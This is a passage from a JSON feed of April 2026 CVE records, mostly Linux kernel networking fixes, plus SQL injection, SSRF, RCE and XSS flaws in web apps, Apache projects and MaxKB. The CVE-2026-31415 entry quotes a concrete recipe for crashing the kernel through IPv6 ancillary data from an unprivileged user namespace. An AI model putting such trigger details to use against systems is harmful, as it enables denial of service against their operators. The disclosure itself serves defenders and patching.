whatever happened to be on the stack.\n\nFix this by pre-initializing rtp_addr from the session-level connection\naddress (caddr) when available, and tracking via a have_rtp_addr flag\nwhether any valid address was established. 
Skip the sdp_session hook\nentirely when no valid address exists.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/01f34a80ac23ae90b1909b94b4ed05343a62f646","https://git.kernel.org/stable/c/52fdda318ef2362fc5936385bcb8b3d0328ee629","https://git.kernel.org/stable/c/6a2b724460cb67caed500c508c2ae5cf012e4db4","https://git.kernel.org/stable/c/6e5e3c87b7e6212f1d8414fc2e4d158b01e12025","https://git.kernel.org/stable/c/7edca70751b9bdb5b83eed53cde21eccf3c86147","https://git.kernel.org/stable/c/fe463e76c9b4b0b43b5ee8961b4c500231f1a3f6"],"published_time":"2026-04-13T14:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31428","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nfnetlink_log: fix uninitialized padding leak in NFULA_PAYLOAD\n\n__build_packet_message() manually constructs the NFULA_PAYLOAD netlink\nattribute using skb_put() and skb_copy_bits(), bypassing the standard\nnla_reserve()/nla_put() helpers. While nla_total_size(data_len) bytes\nare allocated (including NLA alignment padding), only data_len bytes\nof actual packet data are copied. The trailing nla_padlen(data_len)\nbytes (1-3 when data_len is not 4-byte aligned) are never initialized,\nleaking stale heap contents to userspace via the NFLOG netlink socket.\n\nReplace the manual attribute construction with nla_reserve(), which\nhandles the tailroom check, header setup, and padding zeroing via\n__nla_reserve(). 
The subsequent skb_copy_bits() fills in the payload\ndata on top of the properly initialized attribute.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/52025ebaa29f4eb4ed8bf92ce83a68f24ab7fdf7","https://git.kernel.org/stable/c/7eff72968161fb8ddb26113344de3b92fb7d7ef5","https://git.kernel.org/stable/c/a2f6ff3444b663d6cfa63eadd61327a18592885a","https://git.kernel.org/stable/c/a8365d1064ded323797c5e28e91070c52f44b76c","https://git.kernel.org/stable/c/c9f6c51d36482805ac3ffadb9663fe775a13e926","https://git.kernel.org/stable/c/fc961dd7272b5e4a462999635e44a4770d7f2482"],"published_time":"2026-04-13T14:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31417","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet/x25: Fix overflow when accumulating packets\n\nAdd a check to ensure that `x25_sock.fraglen` does not overflow.\n\nThe `fraglen` also needs to be reset when purging `fragment_queue` in\n`x25_clear_queues()`.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/1734bd85c5e0a7a801295b729efb56b009cb8fc3","https://git.kernel.org/stable/c/4e2d1bcef78d21247fe8fef13bc7ed95885df2b5","https://git.kernel.org/stable/c/6e568835ea54a3e1d08e310e34f95d434e739477","https://git.kernel.org/stable/c/8c92969c197b91c134be27dc3afb64ab468853a9","https://git.kernel.org/stable/c/a1822cb524e89b4cd2cf0b82e484a2335496a6d9","https://git.kernel.org/stable/c/f953f11ccf4afe6feb635c08145f4240d9a6b544"],"published_time":"2026-04-13T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31418","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: 
ipset: drop logically empty buckets in mtype_del\n\nmtype_del() counts empty slots below n->pos in k, but it only drops the\nbucket when both n->pos and k are zero. This misses buckets whose live\nentries have all been removed while n->pos still points past deleted slots.\n\nTreat a bucket as empty when all positions below n->pos are unused and\nrelease it directly instead of shrinking it further.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/68ca0eea0af02bed36c5e2c13e9fa1647c31a7d4","https://git.kernel.org/stable/c/6cea34d7ec6829b62f521a37a287f670144a2233","https://git.kernel.org/stable/c/9862ef9ab0a116c6dca98842aab7de13a252ae02","https://git.kernel.org/stable/c/ad92ee87462f9a3061361d392e9dbfe2e5c1c9fb","https://git.kernel.org/stable/c/b7eef00f08b92b0b9efe8ae0df6d0005e6199323","https://git.kernel.org/stable/c/ceacaa76f221a6577aba945bb8873c2e640aeba4"],"published_time":"2026-04-13T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31419","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bonding: fix use-after-free in bond_xmit_broadcast()\n\nbond_xmit_broadcast() reuses the original skb for the last slave\n(determined by bond_is_last_slave()) and clones it for others.\nConcurrent slave enslave/release can mutate the slave list during\nRCU-protected iteration, changing which slave is \"last\" mid-loop.\nThis causes the original skb to be double-consumed (double-freed).\n\nReplace the racy bond_is_last_slave() check with a simple index\ncomparison (i + 1 == slaves_count) against the pre-snapshot slave\ncount taken via READ_ONCE() before the loop.  
This preserves the\nzero-copy optimization for the last slave while making the \"last\"\ndetermination stable against concurrent list mutations.\n\nThe UAF can trigger the following crash:\n\n==================================================================\nBUG: KASAN: slab-use-after-free in skb_clone\nRead of size 8 at addr ffff888100ef8d40 by task exploit/147\n\nCPU: 1 UID: 0 PID: 147 Comm: exploit Not tainted 7.0.0-rc3+ #4 PREEMPTLAZY\nCall Trace:\n <TASK>\n dump_stack_lvl (lib/dump_stack.c:123)\n print_report (mm/kasan/report.c:379 mm/kasan/report.c:482)\n kasan_report (mm/kasan/report.c:597)\n skb_clone (include/linux/skbuff.h:1724 include/linux/skbuff.h:1792 include/linux/skbuff.h:3396 net/core/skbuff.c:2108)\n bond_xmit_broadcast (drivers/net/bonding/bond_main.c:5334)\n bond_start_xmit (drivers/net/bonding/bond_main.c:5567 drivers/net/bonding/bond_main.c:5593)\n dev_hard_start_xmit (include/linux/netdevice.h:5325 include/linux/netdevice.h:5334 net/core/dev.c:3871 net/core/dev.c:3887)\n __dev_queue_xmit (include/linux/netdevice.h:3601 net/core/dev.c:4838)\n ip6_finish_output2 (include/net/neighbour.h:540 include/net/neighbour.h:554 net/ipv6/ip6_output.c:136)\n ip6_finish_output (net/ipv6/ip6_output.c:208 net/ipv6/ip6_output.c:219)\n ip6_output (net/ipv6/ip6_output.c:250)\n ip6_send_skb (net/ipv6/ip6_output.c:1985)\n udp_v6_send_skb (net/ipv6/udp.c:1442)\n udpv6_sendmsg (net/ipv6/udp.c:1733)\n __sys_sendto (net/socket.c:730 net/socket.c:742 net/socket.c:2206)\n __x64_sys_sendto (net/socket.c:2209)\n do_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\n </TASK>\n\nAllocated by task 147:\n\nFreed by task 147:\n\nThe buggy address belongs to the object at ffff888100ef8c80\n which belongs to the cache skbuff_head_cache of size 224\nThe buggy address is located 192 bytes inside of\n freed 224-byte region [ffff888100ef8c80, ffff888100ef8d60)\n\nMemory state around the buggy 
address:\n ffff888100ef8c00: fb fb fb fb fc fc fc fc fc fc fc fc fc fc fc fc\n ffff888100ef8c80: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n>ffff888100ef8d00: fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc\n                                                    ^\n ffff888100ef8d80: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb\n ffff888100ef8e00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n==================================================================","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.03894,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/2884bf72fb8f03409e423397319205de48adca16","https://git.kernel.org/stable/c/d4cc7e4c80b1634c7b1497574a2fdb18df6c026c","https://git.kernel.org/stable/c/f5b94654a4a19891a8108d66ef166de6c028c6cd"],"published_time":"2026-04-13T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31420","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nbridge: mrp: reject zero test interval to avoid OOM panic\n\nbr_mrp_start_test() and br_mrp_start_in_test() accept the user-supplied\ninterval value from netlink without validation. When interval is 0,\nusecs_to_jiffies(0) yields 0, causing the delayed work\n(br_mrp_test_work_expired / br_mrp_in_test_work_expired) to reschedule\nitself with zero delay. This creates a tight loop on system_percpu_wq\nthat allocates and transmits MRP test frames at maximum rate, exhausting\nall system memory and causing a kernel panic via OOM deadlock.\n\nThe same zero-interval issue applies to br_mrp_start_in_test_parse()\nfor interconnect test frames.\n\nUse NLA_POLICY_MIN(NLA_U32, 1) in the nla_policy tables for both\nIFLA_BRIDGE_MRP_START_TEST_INTERVAL and\nIFLA_BRIDGE_MRP_START_IN_TEST_INTERVAL, so zero is rejected at the\nnetlink attribute parsing layer before the value ever reaches the\nworkqueue scheduling code. 
This is consistent with how other bridge\nsubsystems (br_fdb, br_mst) enforce range constraints on netlink\nattributes.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05646,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/c9bc352f716d1bebfe43354bce539ec2d0223b30","https://git.kernel.org/stable/c/fa6e24963342de4370e3a3c9af41e38277b74cf3"],"published_time":"2026-04-13T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31421","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: cls_fw: fix NULL pointer dereference on shared blocks\n\nThe old-method path in fw_classify() calls tcf_block_q() and\ndereferences q->handle.  Shared blocks leave block->q NULL, causing a\nNULL deref when an empty cls_fw filter is attached to a shared block\nand a packet with a nonzero major skb mark is classified.\n\nReject the configuration in fw_change() when the old method (no\nTCA_OPTIONS) is used on a shared block, since fw_classify()'s\nold-method path needs block->q which is NULL for shared blocks.\n\nThe fixed null-ptr-deref calling stack:\n KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f]\n RIP: 0010:fw_classify (net/sched/cls_fw.c:81)\n Call Trace:\n  tcf_classify (./include/net/tc_wrapper.h:197 net/sched/cls_api.c:1764 net/sched/cls_api.c:1860)\n  tc_run (net/core/dev.c:4401)\n  __dev_queue_xmit (net/core/dev.c:4535 
net/core/dev.c:4790)","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/18328eff2f97d1a6adcdb6d4a0f42f2f83a31e28","https://git.kernel.org/stable/c/3cb055df9e8625ce699a259d8178d67b37f2b160","https://git.kernel.org/stable/c/3d41f9a314afa94b1c7c7c75405920123220e8cd","https://git.kernel.org/stable/c/5cf41031922c154aa5ccda8bcdb0f5e6226582ec","https://git.kernel.org/stable/c/96426c348def662b06bfdc65be3002905604927a","https://git.kernel.org/stable/c/faeea8bbf6e958bf3c00cb08263109661975987c"],"published_time":"2026-04-13T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31422","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: cls_flow: fix NULL pointer dereference on shared blocks\n\nflow_change() calls tcf_block_q() and dereferences q->handle to derive\na default baseclass.  Shared blocks leave block->q NULL, causing a NULL\nderef when a flow filter without a fully qualified baseclass is created\non a shared block.\n\nCheck tcf_block_shared() before accessing block->q and return -EINVAL\nfor shared blocks.  
This avoids the null-deref shown below:\n\n=======================================================================\nKASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f]\nRIP: 0010:flow_change (net/sched/cls_flow.c:508)\nCall Trace:\n tc_new_tfilter (net/sched/cls_api.c:2432)\n rtnetlink_rcv_msg (net/core/rtnetlink.c:6980)\n [...]\n=======================================================================","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/1a280dd4bd1d616a01d6ffe0de284c907b555504","https://git.kernel.org/stable/c/415ea0c973c754b9f375225807810eb9045f4293","https://git.kernel.org/stable/c/4a09f72007201c9f667dc47f64517ec23eea65e5","https://git.kernel.org/stable/c/9bf5fc36a43f7b8b5507c96e74fb81f1e8b4957e","https://git.kernel.org/stable/c/a208c3e1232997e9317887294c20008dfcb75449","https://git.kernel.org/stable/c/cc707a4fd4c3b6ab2722e06bc359aa010e13d408"],"published_time":"2026-04-13T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31414","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conntrack_expect: use expect->helper\n\nUse expect->helper in ctnetlink and /proc to dump the helper name.\nUsing nfct_help() without holding a reference to the master conntrack\nis unsafe.\n\nUse exp->master->helper in ctnetlink path if userspace does not provide\nan explicit helper when creating an expectation to retain the existing\nbehaviour. 
The ctnetlink expectation path holds the reference on the\nmaster conntrack and nf_conntrack_expect lock and the nfnetlink glue\npath refers to the master ct that is attached to the skb.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/3dfd3f7712b5a800f2ba632179e9b738076a51f0","https://git.kernel.org/stable/c/4bd1b3d839172724b33d8d02c5a4ff6a1c775417","https://git.kernel.org/stable/c/847cb7fe26c5ce5dce0d1a41fac1ea488b7f1781","https://git.kernel.org/stable/c/b53294bff19e56ada2f230ceb8b1ffde61cc3817","https://git.kernel.org/stable/c/e7ccaa0a62a8ff2be5d521299ce79390c318d306","https://git.kernel.org/stable/c/f01794106042ee27e54af6fdf5b319a2fe3df94d"],"published_time":"2026-04-13T14:16:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31415","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: avoid overflows in ip6_datagram_send_ctl()\n\nYiming Qian reported :\n<quote>\n I believe I found a locally triggerable kernel bug in the IPv6 sendmsg\n ancillary-data path that can panic the kernel via `skb_under_panic()`\n (local DoS).\n\n The core issue is a mismatch between:\n\n - a 16-bit length accumulator (`struct ipv6_txoptions::opt_flen`, type\n `__u16`) and\n - a pointer to the *last* provided destination-options header (`opt->dst1opt`)\n\n when multiple `IPV6_DSTOPTS` control messages (cmsgs) are provided.\n\n - `include/net/ipv6.h`:\n   - `struct ipv6_txoptions::opt_flen` is `__u16` (wrap possible).\n (lines 291-307, especially 298)\n - `net/ipv6/datagram.c:ip6_datagram_send_ctl()`:\n   - Accepts repeated `IPV6_DSTOPTS` and accumulates into `opt_flen`\n without rejecting duplicates. (lines 909-933)\n - `net/ipv6/ip6_output.c:__ip6_append_data()`:\n   - Uses `opt->opt_flen + opt->opt_nflen` to compute header\n sizes/headroom decisions. 
(lines 1448-1466, especially 1463-1465)\n - `net/ipv6/ip6_output.c:__ip6_make_skb()`:\n   - Calls `ipv6_push_frag_opts()` if `opt->opt_flen` is non-zero.\n (lines 1930-1934)\n - `net/ipv6/exthdrs.c:ipv6_push_frag_opts()` / `ipv6_push_exthdr()`:\n   - Push size comes from `ipv6_optlen(opt->dst1opt)` (based on the\n pointed-to header). (lines 1179-1185 and 1206-1211)\n\n 1. `opt_flen` is a 16-bit accumulator:\n\n - `include/net/ipv6.h:298` defines `__u16 opt_flen; /* after fragment hdr */`.\n\n 2. `ip6_datagram_send_ctl()` accepts *repeated* `IPV6_DSTOPTS` cmsgs\n and increments `opt_flen` each time:\n\n - In `net/ipv6/datagram.c:909-933`, for `IPV6_DSTOPTS`:\n   - It computes `len = ((hdr->hdrlen + 1) << 3);`\n   - It checks `CAP_NET_RAW` using `ns_capable(net->user_ns,\n CAP_NET_RAW)`. (line 922)\n   - Then it does:\n     - `opt->opt_flen += len;` (line 927)\n     - `opt->dst1opt = hdr;` (line 928)\n\n There is no duplicate rejection here (unlike the legacy\n `IPV6_2292DSTOPTS` path which rejects duplicates at\n `net/ipv6/datagram.c:901-904`).\n\n If enough large `IPV6_DSTOPTS` cmsgs are provided, `opt_flen` wraps\n while `dst1opt` still points to a large (2048-byte)\n destination-options header.\n\n In the attached PoC (`poc.c`):\n\n - 32 cmsgs with `hdrlen=255` => `len = (255+1)*8 = 2048`\n - 1 cmsg with `hdrlen=0` => `len = 8`\n - Total increment: `32*2048 + 8 = 65544`, so `(__u16)opt_flen == 8`\n - The last cmsg is 2048 bytes, so `dst1opt` points to a 2048-byte header.\n\n 3. The transmit path sizes headers using the wrapped `opt_flen`:\n\n- In `net/ipv6/ip6_output.c:1463-1465`:\n  - `headersize = sizeof(struct ipv6hdr) + (opt ? opt->opt_flen +\n opt->opt_nflen : 0) + ...;`\n\n With wrapped `opt_flen`, `headersize`/headroom decisions underestimate\n what will be pushed later.\n\n 4. 
When building the final skb, the actual push length comes from\n `dst1opt` and is not limited by wrapped `opt_flen`:\n\n - In `net/ipv6/ip6_output.c:1930-1934`:\n   - `if (opt->opt_flen) proto = ipv6_push_frag_opts(skb, opt, proto);`\n - In `net/ipv6/exthdrs.c:1206-1211`, `ipv6_push_frag_opts()` pushes\n `dst1opt` via `ipv6_push_exthdr()`.\n - In `net/ipv6/exthdrs.c:1179-1184`, `ipv6_push_exthdr()` does:\n   - `skb_push(skb, ipv6_optlen(opt));`\n   - `memcpy(h, opt, ipv6_optlen(opt));`\n\n With insufficient headroom, `skb_push()` underflows and triggers\n `skb_under_panic()` -> `BUG()`:\n\n - `net/core/skbuff.c:2669-2675` (`skb_push()` calls `skb_under_panic()`)\n - `net/core/skbuff.c:207-214` (`skb_panic()` ends in `BUG()`)\n\n - The `IPV6_DSTOPTS` cmsg path requires `CAP_NET_RAW` in the target\n netns user namespace (`ns_capable(net->user_ns, CAP_NET_RAW)`).\n - Root (or any task with `CAP_NET_RAW`) can trigger this without user\n namespaces.\n - An unprivileged `uid=1000` user can trigger this if unprivileged\n user namespaces are enabled and it can create a userns+netns to obtain\n namespaced `CAP_NET_RAW` (the attached PoC does this).\n\n - Local denial of service: kernel BUG/panic (system crash).\n 
-\n---truncated---","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08473,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/0bdaf54d3aaddfe8df29371260fa8d4939b4fd6f","https://git.kernel.org/stable/c/4e453375561fc60820e6b9d8ebeb6b3ee177d42e","https://git.kernel.org/stable/c/5e4ee5dbea134e9257f205e31a96040bed71e83f","https://git.kernel.org/stable/c/63fda74885555e6bd1623b5d811feec998740ba4","https://git.kernel.org/stable/c/872b74900d5daa37067ac676d9001bb929fc6a2a","https://git.kernel.org/stable/c/9ed81d692758dfb9471d7799b24bfa7a08224c31"],"published_time":"2026-04-13T14:16:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31416","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nfnetlink_log: account for netlink header size\n\nThis is a followup to an old bug fix: NLMSG_DONE needs to account\nfor the netlink header size, not just the attribute size.\n\nThis can result in a WARN splat + drop of the netlink message,\nbut other than this there are no ill effects.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/607245c4dbb86d9a10dd8388da0fb82170a99b61","https://git.kernel.org/stable/c/6b419700e459fbf707ca1543b7c1b57a60fedb73","https://git.kernel.org/stable/c/6d52a4a0520a6696bdde51caa11f2d6821cd0c01","https://git.kernel.org/stable/c/761b45c661af48da6a065868d59ab1e1f64fd9b6","https://git.kernel.org/stable/c/88a8f56e6276f616baad4274c6b8e4683e26e520","https://git.kernel.org/stable/c/f08ffa3e1c8e36b6131f69c5eb23700c28cbd262"],"published_time":"2026-04-13T14:16:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36922","summary":"Sourcecodester Cab Management System v1.0 is vulnerable to SQL injection in the file 
/cms/admin/categories/view_category.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/hubdk01/bug_report/blob/main/Sourcecodester/cab-management-system/SQL-1.md"],"published_time":"2026-04-13T13:16:42","vendor":"oretnom23","product":"cab_management_system","version":null},{"cve_id":"CVE-2026-36923","summary":"Sourcecodester Cab Management System 1.0 is vulnerable to SQL Injection in the file /cms/admin/bookings/view_booking.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/hubdk01/bug_report/blob/main/Sourcecodester/cab-management-system/SQL-2.md"],"published_time":"2026-04-13T13:16:42","vendor":"oretnom23","product":"cab_management_system","version":null},{"cve_id":"CVE-2026-36872","summary":"Sourcecodester Basic Library System v1.0 is vulnerable to SQL Injection in /librarysystem/load_book.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Thirtypenny77/bug_report/blob/main/sourcecodester/basic-library-system/SQL-1.md"],"published_time":"2026-04-13T13:16:41","vendor":"razormist","product":"basic_library_system","version":null},{"cve_id":"CVE-2026-36873","summary":"Sourcecodester Basic Library System v1.0 is vulnerable to SQL Injection in 
/librarysystem/load_admin.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Thirtypenny77/bug_report/blob/main/sourcecodester/basic-library-system/SQL-2.md"],"published_time":"2026-04-13T13:16:41","vendor":"razormist","product":"basic_library_system","version":null},{"cve_id":"CVE-2026-36874","summary":"Sourcecodester Basic Library System v1.0 is vulnerable to SQL Injection in /librarysystem/load_student.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.0535,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Thirtypenny77/bug_report/blob/main/sourcecodester/basic-library-system/SQL-3.md"],"published_time":"2026-04-13T13:16:41","vendor":"razormist","product":"basic_library_system","version":null},{"cve_id":"CVE-2026-36919","summary":"Sourcecodester Online Reviewer System v1.0 is vulnerable to SQL Injection in the file /system/system/admins/assessments/examproper/exam-update.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05333,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/hubdk01/bug_report/blob/main/Sourcecodester/online-reviewer-system/SQL-2.md"],"published_time":"2026-04-13T13:16:41","vendor":"janobe","product":"online_reviewer_system","version":null},{"cve_id":"CVE-2026-36920","summary":"Sourcecodester Online Reviewer System v1.0 is vulnerable to SQL Injection in the file 
/system/system/admins/assessments/examproper/questions-view.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05333,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/hubdk01/bug_report/blob/main/Sourcecodester/online-reviewer-system/SQL-1.md"],"published_time":"2026-04-13T13:16:41","vendor":"janobe","product":"online_reviewer_system","version":null},{"cve_id":"CVE-2026-34476","summary":"Server-Side Request Forgery via SW-URL Header vulnerability in Apache SkyWalking MCP.\n\nThis issue affects Apache SkyWalking MCP: 0.1.0.\n\nUsers are recommended to upgrade to version 0.2.0, which fixes this issue.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07905,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lists.apache.org/thread/v0k1xyzzbtnpyrwxwyn36pbspr8rhjnr","http://www.openwall.com/lists/oss-security/2026/04/13/4"],"published_time":"2026-04-13T13:16:40","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6204","summary":"LibreNMS versions before 26.3.0 are affected by an authenticated remote code execution vulnerability by abusing the Binary Locations config and the Netcommand feature. Successful exploitation requires administrative privileges. 
Exploitation could result in compromise of the underlying web server.","cvss":8.5,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.5,"epss":6e-05,"ranking_epss":0.00303,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh","https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc"],"published_time":"2026-04-13T11:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2728","summary":"LibreNMS versions before 26.3.0 are affected by an authenticated Cross-site Scripting vulnerability on the showconfig page. Successful exploitation requires administrative privileges. Exploitation could result in XSS attacks being performed against other users with access to the page.","cvss":4.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":4.6,"epss":2e-05,"ranking_epss":0.00041,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#xss-on-showconfig-page-2630"],"published_time":"2026-04-13T11:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35337","summary":"Deserialization of Untrusted Data vulnerability in Apache Storm.\n\nVersions Affected:\nbefore 2.8.6.\n\n\nDescription:\nWhen processing topology credentials submitted via the Nimbus Thrift API, Storm deserializes the base64-encoded TGT blob using ObjectInputStream.readObject() without any class filtering or validation. 
An authenticated user with topology submission rights could supply a crafted serialized object in the \"TGT\" credential field, leading to remote code execution in both the Nimbus and Worker JVMs.\n\n\nMitigation:\n2.x users should upgrade to 2.8.6.\n\n\nUsers who cannot upgrade immediately should monkey-patch an ObjectInputFilter allow-list to ClientAuthUtils.deserializeKerberosTicket() restricting deserialized classes to javax.security.auth.kerberos.KerberosTicket and its known dependencies. A guide on how to do this is available in the release notes of 2.8.6.\n\nCredit: This issue was discovered by K.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.00416,"ranking_epss":0.61705,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://storm.apache.org/2026/04/12/storm286-released.html","http://www.openwall.com/lists/oss-security/2026/04/12/6"],"published_time":"2026-04-13T10:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35565","summary":"Stored Cross-Site Scripting (XSS) via Unsanitized Topology Metadata in Apache Storm UI\n\n\nVersions Affected: before 2.8.6\n\n\nDescription: The Storm UI visualization component interpolates topology metadata including component IDs, stream names, and grouping values directly into HTML via innerHTML in parseNode() and parseEdge() without sanitization at any layer. An authenticated user with topology submission rights could craft a topology containing malicious HTML/JavaScript in component identifiers (e.g., a bolt ID containing an onerror event handler). This payload flows through Nimbus → Thrift → the Visualization API → vis.js tooltip rendering, resulting in stored cross-site scripting. 
\n\nIn multi-tenant deployments where topology submission is available to less-trusted users but the UI is accessed by operators or administrators, this enables privilege escalation through script execution in an admin's browser session.\n\n\nMitigation: 2.x users should upgrade to 2.8.6. Users who cannot upgrade immediately should monkey-patch the parseNode() and parseEdge() functions in the visualization JavaScript file to HTML-escape all API-supplied values including nodeId, :capacity, :latency, :component, :stream, and :grouping before interpolation into tooltip HTML strings, and should additionally restrict topology submission to trusted users via Nimbus ACLs as a defense-in-depth measure. A guide on how to do this is available in the release notes of 2.8.6.\n\nCredit: This issue was discovered while investigating another report by K.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00033,"ranking_epss":0.09347,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://storm.apache.org/2026/04/12/storm286-released.html","http://www.openwall.com/lists/oss-security/2026/04/12/7"],"published_time":"2026-04-13T10:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-15632","summary":"A vulnerability has been found in 1Panel-dev MaxKB up to 2.4.2. Impacted is an unknown function of the file ui/src/chat.ts of the component MdPreview. Such manipulation leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.5.0 is recommended to address this issue. The name of the patch is 7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8. It is advisable to upgrade the affected component. 
